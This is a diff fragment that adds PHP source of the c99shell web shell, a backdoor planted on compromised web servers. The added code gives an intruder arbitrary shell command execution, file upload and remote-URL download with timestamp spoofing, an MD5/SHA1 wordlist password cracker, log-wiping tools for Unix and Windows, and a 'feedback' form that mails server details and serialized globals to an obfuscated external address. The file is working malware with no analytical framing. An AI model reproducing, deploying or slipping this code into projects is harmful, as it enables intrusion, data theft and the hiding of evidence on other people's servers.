+Enter hash: <input type=text width=300 name="hash" size=40>
+<br>
+Wordlist: <input type=text name="wordlist" size=40>
+<br>
+Type: <select name="type">
+<option value="md5">MD5</option>
+<option value="sha1">SHA1</option>
+</select> <input type=submit value="Crack Hash">
+</form>
+</center>
+<?php
+// my wordlist cracker ^_^
+if (isset($_GET['hash']) && isset($_GET['wordlist']) && ($_GET['type'] == 'md5' || $_GET['type'] == 'sha1')) {
+	$type = $_GET['type'];
+	$hash = $_GET['hash'];
+	$count = 1;
+	$wordlist = file($_GET['wordlist']);
+	$words = count($wordlist);
+	foreach ($wordlist as $word) {
+		echo $count.' of '.$words.': '.$word.'<br>';
+		if ($hash == $type(rtrim($word))) {
+			echo '<font color=red>Great success!  The password is: '.$word.'</font><br>';
+			exit;
+		}
+		++$count;
+	}
+}
+
+} 
+if ($act == 'fsbuff') 
+{ 
+ $arr_copy = $sess_data["copy"]; 
+ $arr_cut = $sess_data["cut"]; 
+ $arr = array_merge($arr_copy,$arr_cut); 
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} 
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} 
+} 
+if ($act == "selfremove") 
+{ 
+ if (($submit == $rndcode) and ($submit != "")) 
+ { 
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } 
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} 
+ } 
+ else 
+ { 
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} 
+  $rnd = rand(0,9).rand(0,9).rand(0,9); 
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; 
+ } 
+} 
+if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} 
+if ($act == "feedback") 
+{ 
+ $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); 
+ if (!empty($submit)) 
+ { 
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6); 
+  $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; 
+  if (!empty($fdbk_ref)) 
+  { 
+   $tmp = @ob_get_contents(); 
+   ob_clean(); 
+   phpinfo(); 
+   $phpinfo = base64_encode(ob_get_contents()); 
+   ob_clean(); 
+   echo $tmp; 
+   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; 
+  } 
+  mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); 
+  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; 
+ } 
+ else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} 
+} 
+if ($act == "search") 
+{ 
+ echo "<b>Search in file-system:</b><br>"; 
+ if (empty($search_in)) {$search_in = $d;} 
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} 
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;} 
+ if (!empty($submit)) 
+ { 
+  $found = array(); 
+  $found_d = 0; 
+  $found_f = 0; 
+  $search_i_f = 0; 
+  $search_i_d = 0; 
+  $a = array 
+  ( 
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp, 
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp, 
+   "text_wwo"=>$search_text_wwo, 
+   "text_cs"=>$search_text_cs, 
+   "text_not"=>$search_text_not 
+  ); 
+  $searchtime = getmicrotime(); 
+  $in = array_unique(explode(";",$search_in)); 
+  foreach($in as $v) {c99fsearch($v);} 
+  $searchtime = round(getmicrotime()-$searchtime,4); 
+  if (count($found) == 0) {echo "<b>No files found!</b>";} 
+  else 
+  { 
+   $ls_arr = $found; 
+   $disp_fullpath = TRUE; 
+   $act = "ls"; 
+  } 
+ } 
+ echo "<form method=POST> 
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> 
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp 
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> 
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> 
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text 
+<br><br><input type=submit name=submit value=\"Search\"></form>"; 
+ if ($act == 'ls') {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} 
+} 
+if ($act == 'chmod') 
+{ 
+ $mode = fileperms($d.$f); 
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} 
+ else 
+ { 
+  $form = TRUE; 
+  if ($chmod_submit) 
+  { 
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); 
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} 
+   else {$err = "Can't chmod to ".$octet.".";} 
+  } 
+  if ($form) 
+  { 
+   $perms = parse_perms($mode); 
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; 
+  } 
+ } 
+} 
+if ($act == "upload") 
+{ 
+ $uploadmess = ""; 
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); 
+ if (empty($uploadpath)) {$uploadpath = $d;} 
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} 
+ if (!empty($submit)) 
+ { 
+  global $HTTP_POST_FILES; 
+  $uploadfile = $HTTP_POST_FILES["uploadfile"]; 
+  if (!empty($uploadfile["tmp_name"])) 
+  { 
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];} 
+   else {$destin = $userfilename;} 
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} 
+  } 
+  elseif (!empty($uploadurl)) 
+  { 
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;} 
+   else 
+   { 
+    $destin = explode("/",$destin); 
+    $destin = $destin[count($destin)-1]; 
+    if (empty($destin)) 
+    { 
+     $i = 0; 
+     $b = ""; 
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} 
+   } 
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} 
+   else 
+   { 
+    $st = getmicrotime(); 
+    $content = @file_get_contents($uploadurl); 
+    $dt = round(getmicrotime()-$st,4); 
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";} 
+    else 
+    { 
+     if ($filestealth) {$stat = stat($uploadpath.$destin);} 
+     $fp = fopen($uploadpath.$destin,"w"); 
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} 
+     else 
+     { 
+      fwrite($fp,$content,strlen($content)); 
+      fclose($fp); 
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} 
+     } 
+    } 
+   } 
+  } 
+ } 
+ if ($miniform) 
+ { 
+  echo "<b>".$uploadmess."</b>"; 
+  $act = "ls"; 
+ } 
+ else 
+ { 
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> 
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> 
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> 
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> 
+File-name (auto-fill): <input name=uploadfilename size=25><br><br> 
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> 
+<input type=submit name=submit value=\"Upload\"> 
+</form>"; 
+ } 
+} 
+if ($act == 'md5file') {
+?>
+<center><b>MD5 Checksum:</b></center><br>
+<table border=0 align=center>
+<?php
+	foreach ($actbox as $v)
+		echo '<tr><td>'.md5_file($v).'</td><td>'.$v.'</td></tr>';
+echo "</table></td></tr></table><br><TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+	$act = 'ls';
+}
+if ($act == 'sha1file') {
+?>
+<center><b>SHA1 Checksum:</b></center><br>
+<table border=0 align=center>
+<?php
+	foreach ($actbox as $v)
+		echo '<tr><td>'.sha1_file($v).'</td><td>'.$v.'</td></tr>';
+echo "</table></td></tr></table><br><TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+	$act = 'ls';
+}
+if ($act == 'delete')
+{
+ $delerr = '';
+ foreach ($actbox as $v) 
+ { 
+  $result = FALSE; 
+  $result = fs_rmobj($v); 
+  if (!$result)
+	$delerr .= 'Can\'t delete '.htmlspecialchars($v).'<br>'; 
+ } 
+ if (!empty($delerr))
+	echo '<b>Deleting with errors:</b><br>'.$delerr;
+ $act = 'ls';
+} 
+if (!$usefsbuff) 
+{ 
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} 
+} 
+else 
+{ 
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } 
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} 
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actarcbuff) 
+ { 
+  $arcerr = ""; 
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} 
+  else {$ext = ".tar.gz";} 
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} 
+  $cmdline .= " ".$actarcbuff_path; 
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]); 
+  foreach($objects as $v) 
+  { 
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); 
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} 
+   if (is_dir($v)) 
+   { 
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} 
+    $v .= "*"; 
+   } 
+   $cmdline .= " ".$v; 
+  } 
+  $tmp = realpath("."); 
+  chdir($d); 
+  $ret = myshellexec($cmdline); 
+  chdir($tmp); 
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} 
+  $ret = str_replace("\r\n","\n",$ret); 
+  $ret = explode("\n",$ret); 
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   if (in_array($v,$ret)) {fs_rmobj($v);} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+}
+// the wipe logs stuff needs to be before cmd, because it will change the $act if the write is successful
+if ($act == 'miglc' || $act == 'zap2') { // *nix cleaners
+	if (is_writable('.')) {
+		cf($act, $$act); // 'tis pure innovation of optimization :)
+		$cmd = './'.$act; // keep this before $act = 'cmd';
+		$act = 'cmd';
+		$cmd_txt = '1';
+	}else{
+		echo 'Directory Is Not Writable!<br>';
+	}
+}
+if ($act == 'clearlogs') { // windows cleaners
+	if (is_writable('.')) {
+		cf($act.'.exe', $$act);
+		$cmd = $act.'.exe';
+		$act = 'cmd';
+		$cmd_txt = '1';
+	}else{
+		echo 'Directory Is Not Writable!<br>';
+	}
+}
+if ($act == "cmd") 
+{
+if (trim($cmd) == "ps -aux") {$act = "processes";} 
+elseif (trim($cmd) == "tasklist") {$act = "processes";} 
+else 
+{ 
+ @chdir($chdir); 
+ if (!empty($submit)) 
+ { 
+  echo "<b>Result of execution this command</b>:<br>"; 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  $ret = myshellexec($cmd); 
+  $ret = convert_cyr_string($ret,"d","w"); 
+  if ($cmd_txt) 
+  { 
+   $rows = count(explode("\r\n",$ret))+1; 
+   if ($rows < 10) {$rows = 10;} 
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+  } 
+  else {echo $ret."<br>";} 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; 
+} 
+} 
+if ($act == 'ls')
+{ 
+ if (count($ls_arr) > 0) {$list = $ls_arr;} 
+ else 
+ { 
+  $list = array(); 
+  if ($h = @opendir($d))
+  { 
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} 
+   closedir($h); 
+  } 
+  else {} 
+ } 
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} 
+ else 
+ { 
+  //Building array 
+  $objects = array(); 
+  $vd = "f"; //Viewing mode 
+  if ($vd == "f") 
+  { 
+   $objects["head"] = array(); 
+   $objects["folders"] = array(); 
+   $objects["links"] = array(); 
+   $objects["files"] = array(); 
+   foreach ($list as $v) 
+   { 
+    $o = basename($v); 
+    $row = array(); 
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) {$type = "LINK";} 
+     else {$type = "DIR";} 
+     $row[] = $v; 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} 
+    $row[] = filemtime($v); 
+    if (!$win) 
+    { 
+     $ow = posix_getpwuid(fileowner($v)); 
+     $gr = posix_getgrgid(filegroup($v)); 
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); 
+    } 
+    $row[] = fileperms($v); 
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} 
+    elseif (is_link($v)) {$objects["links"][] = $row;} 
+    elseif (is_dir($v)) {$objects["folders"][] = $row;} 
+    elseif (is_file($v)) {$objects["files"][] = $row;} 
+    $i++; 
+   } 
+   $row = array(); 
+   $row[] = '<b>Name</b>';
+   $row[] = '<b>Size</b>';
+   $row[] = '<b>Modify</b>';
+   if (!$win)
+	$row[] = '<b>Owner/Group</b>';
+   $row[] = '<b>Perms</b>';
+   $row[] = '<b>Action</b>';
+   $parsesort = parsesort($sort); 
+   $sort = $parsesort[0].$parsesort[1]; 
+   $k = $parsesort[0]; 
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";} 
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; 
+   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; 
+   $row[$k] .= $y; 
+   for($i=0;$i<count($row)-1;$i++) 
+   { 
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} 
+   } 
+   $v = $parsesort[0]; 
+   usort($objects["folders"], "tabsort"); 
+   usort($objects["links"], "tabsort"); 
+   usort($objects["files"], "tabsort"); 
+   if ($parsesort[1] == "d") 
+   { 
+    $objects["folders"] = array_reverse($objects["folders"]); 
+    $objects["files"] = array_reverse($objects["files"]); 
+   } 
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); 
+   $tab = array(); 
+   $tab["cols"] = array($row); 
+   $tab["head"] = array(); 
+   $tab["folders"] = array(); 
+   $tab["links"] = array(); 
+   $tab["files"] = array(); 
+   $i = 0; 
+   foreach ($objects as $a) 
+   { 
+    $v = $a[0]; 
+    $o = basename($v); 
+    $dir = dirname($v); 
+    if ($disp_fullpath) {$disppath = $v;} 
+    else {$disppath = $o;} 
+    $disppath = str2mini($disppath,60); 
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} 
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} 
+    foreach ($regxp_highlight as $r) 
+    { 
+     if (ereg($r[0],$o)) 
+     { 
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} 
+      else 
+      { 
+       $r[1] = round($r[1]); 
+       $isdir = is_dir($v); 
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) 
+       { 
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} 
+        $disppath = $r[2].$disppath.$r[3]; 
+        if ($r[4]) {break;} 
+       } 
+      } 
+     } 
+    } 
+    $uo = urlencode($o); 
+    $ud = urlencode($dir); 
+    $uv = urlencode($v); 
+    $row = array(); 
+    if ($o == ".") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif ($o == "..") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) 
+     { 
+      $disppath .= " => ".readlink($v); 
+      $type = "LINK"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+     } 
+     else 
+     { 
+      $type = "DIR"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+      } 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) 
+    { 
+     $ext = explode(".",$o); 
+     $c = count($ext)-1; 
+     $ext = $ext[$c]; 
+     $ext = strtolower($ext); 
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; 
+     $row[] = view_size($a[1]); 
+    } 
+    $row[] = date("d.m.Y H:i:s",$a[2]); 
+    if (!$win) {$row[] = $a[3];} 
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; 
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} 
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} 
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} 
+    elseif (is_link($v)) {$tab["links"][] = $row;} 
+    elseif (is_dir($v)) {$tab["folders"][] = $row;} 
+    elseif (is_file($v)) {$tab["files"][] = $row;} 
+    $i++; 
+   } 
+  } 
+  // Compiling table 
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); 
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgcolor=#000000 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact.'><input type=hidden name=d value="'.$dispd.'">';
+  $countrows = 0;
+  foreach($table as $row) 
+  { 
+   if ($countrows & 1) {
+   echo "<tr bgcolor=#111111>\r\n"; 
+   } else {
+   echo "<tr>\r\n";
+   }
+   ++$countrows;
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";} 
+   echo "</tr>\r\n"; 
+  } 
+  echo "</table><hr size=\"1\" noshade><p align=\"right\"> 
+  <script> 
+  function ls_setcheckboxall(status) 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = status; 
+    id++; 
+   } 
+  } 
+  function ls_reverse_all() 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; 
+    id++; 
+   } 
+  } 
+  </script> 
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">  
+  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; 
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) 
+  { 
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; 
+  } 
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>"; 
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; 
